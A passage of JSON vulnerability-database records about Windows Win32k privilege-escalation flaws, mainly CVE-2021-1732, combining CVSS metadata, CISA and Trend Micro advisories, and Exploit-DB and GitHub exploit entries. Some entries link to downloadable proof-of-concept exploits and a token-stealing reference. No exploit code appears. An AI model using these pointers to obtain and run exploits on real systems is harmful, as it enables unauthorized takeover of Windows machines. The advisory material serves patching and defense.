"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-0803", "2019-0803"], "modified": "2019-05-15T00:00:00", "id": "EDB-ID:46920", "href": "https://www.exploit-db.com/exploits/46920", "sourceData": "# CVE-2019-0803\r\nWin32k Elevation of Privilege Poc\r\n\r\nReference\r\n-----------------------------\r\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\r\n\r\n\r\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "sourceHref": "https://www.exploit-db.com/download/46920", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2021-12-10T15:37:09", "description": "# CVE-2021-1732\n\n- \u6f0f\u6d1e\u53d1\u751f\u5728Windows \u56fe\u5f62\u9a71\u52a8`win32kfull!NtUserCreateWind...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T01:28:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-11-08T01:36:42", "id": "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:32:27", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T02:13:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-02-16T09:53:06", "id": "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T12:50:14", "description": "# CVE-2021-1732-Exploit\nCVE-2021-1...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T01:35:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-12-18T11:55:36", "id": "1D0AAF42-5E68-5985-A800-90937D55628D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T11:09:02", "description": "<h1 style=\"font-size:10vw\" align=\"center\">Windows Privilege Esca...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T12:55:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-04-04T09:12:40", "id": "5E516DC2-BF71-57D0-9A87-3874146D0F83", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-15T04:36:04", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T05:07:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-05-15T01:30:24", "id": "91A5BC48-2410-555B-B7FB-8138577D6B78", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-05T03:15:52", "description": "# 
CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T02:11:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-05-05T02:28:30", "id": "02C6FE13-5036-5BE5-8AC8-278A918BA581", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:02:35", "description": "# CVE-2020-1054\nCVE-2020-1054 Learning\n\n\nScreenshot\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-19T08:20:57", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Microsoft", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1054", "CVE-2016-7255", "CVE-2019-0808"], "modified": "2021-12-15T14:39:51", "id": "8DEC0717-2A5D-57F3-BBC7-7F0A9C394CC0", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-15T20:28:07", "description": "# CVE-2021-1732\n\nWin32k Elevation Of Privileges\n\nTechni...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-15T16:55:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": 
"2022-02-15T17:00:00", "id": "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T00:00:34", "description": "# CVE-2022-21882\n\nWin32k Elevation Of Privileges\n\nTechn...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T21:28:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21882", "CVE-2021-1732"], "modified": "2022-03-15T22:03:21", "id": "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T07:51:24", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-17...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-27T03:44:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T04:45:33", "id": "1C45657B-E388-5668-9093-F3934858B728", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 
7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-02T05:37:11", "description": "# TOP\nTOP All bugbounty pentesting CVE-2022- POC Exp Things\n## ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-19T01:54:15", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Fusion Middleware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4210", "CVE-2016-0638", "CVE-2016-3510", "CVE-2016-5195", "CVE-2017-10271", "CVE-2017-11882", "CVE-2017-3248", "CVE-2017-3506", "CVE-2018-0296", "CVE-2018-0802", "CVE-2018-0886", "CVE-2018-1002105", "CVE-2018-10933", "CVE-2018-11776", "CVE-2018-13379", "CVE-2018-13382", "CVE-2018-14847", "CVE-2018-15473", "CVE-2018-15982", "CVE-2018-20250", 
"CVE-2018-2628", "CVE-2018-2893", "CVE-2018-2894", "CVE-2018-3191", "CVE-2018-3245", "CVE-2018-3252", "CVE-2018-7600", "CVE-2018-8120", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8581", "CVE-2018-8897", "CVE-2018-9995", "CVE-2019-0192", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0841", "CVE-2019-1003000", "CVE-2019-1003001", "CVE-2019-1003002", "CVE-2019-1040", "CVE-2019-11043", "CVE-2019-11510", "CVE-2019-11708", "CVE-2019-11932", "CVE-2019-12586", "CVE-2019-12587", "CVE-2019-12588", "CVE-2019-1322", "CVE-2019-13272", "CVE-2019-1405", "CVE-2019-17558", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-2107", "CVE-2019-2618", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2890", "CVE-2019-3396", "CVE-2019-5736", "CVE-2019-5786", "CVE-2019-6340", "CVE-2019-9810", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-10199", "CVE-2020-10204", "CVE-2020-11444", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-1362", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-1938", "CVE-2020-2546", "CVE-2020-2551", "CVE-2020-2555", "CVE-2020-25684", "CVE-2020-25685", "CVE-2020-25686", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2883", "CVE-2020-2884", "CVE-2020-2915", "CVE-2020-2950", "CVE-2020-5902", "CVE-2020-6286", "CVE-2020-6287", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31166", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-3129", "CVE-2021-3156", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-3493", "CVE-2021-4034", "CVE-2021-40444", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42278", "CVE-2021-42287", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-0185", "CVE-2022-0337", "CVE-2022-0778", "CVE-2022-0824", "CVE-2022-0847", "CVE-2022-20699", "CVE-2022-21882", "CVE-2022-21907", "CVE-2022-21971", "CVE-2022-21974", "CVE-2022-21999", "CVE-2022-22536", "CVE-2022-22947", 
"CVE-2022-23131", "CVE-2022-23808", "CVE-2022-24086", "CVE-2022-24112", "CVE-2022-25636", "CVE-2022-25943"], "modified": "2022-04-02T05:13:27", "id": "2C119FFA-ECE0-5E14-A4A4-354A2C38071A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "trendmicroblog": [{"lastseen": "2021-10-19T14:36:36", "description": "In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "trendmicroblog", "title": "PurpleFox Adds New Backdoor That Uses WebSockets", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-10-19T00:00:00", "id": "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71", "href": "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "cvss": {"score": 4.6, "vector": 
"AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T18:37:14", "description": "In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "trendmicroblog", "title": "PurpleFox Adds New Backdoor That Uses WebSockets", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-10-19T00:00:00", "id": "TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "href": "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-03-08T18:38:38", "description": "Microsoft has released a security advisory to address an escalation of privileges vulnerability, [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), 
in Microsoft Win32k. A local attacker can exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.\n\nCISA encourages users and administrators to review Microsoft Advisory for CVE-2021-1732 and apply the necessary patch to Windows 10 and Windows 2019 servers.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "cisa", "title": "Microsoft Warns of Windows Win32k Privilege Escalation", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CISA:911DE59572B6EF78B42DD868D622F637", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-02-16T18:53:24", "description": "Microsoft has removed a faulty servicing stack update, which was causing issues for Windows users when they tried to install last week\u2019s [Patch Tuesday security updates](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>).\n\nMicrosoft\u2019s [servicing stack update](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) provides fixes for the component that installs Windows updates. This particular defective update ([KB4601392](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)) applied to Windows 10 users (version 1607 for 32-bit and x64-based systems) and Windows Server 2016 users.\n\nTo address this issue, Microsoft has removed the faulty update and released a new one ([KB5001078](<https://support.microsoft.com/en-us/topic/kb5001078-servicing-stack-update-for-windows-10-version-1607-february-12-2021-3e19bfd1-7711-48a8-978b-ce3620ec6362>)).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThere is a known issue that halts the installation progress of the February 9, 2021 security update,\u201d said Microsoft on Friday.\n\n## **Microsoft Faulty Update: A Windows Security Issue **\n\nMicrosoft said that the erroneous servicing-stack update (KB4601392) froze installations for the \u201cCumulative Update\u201d from the recent Windows Update. 
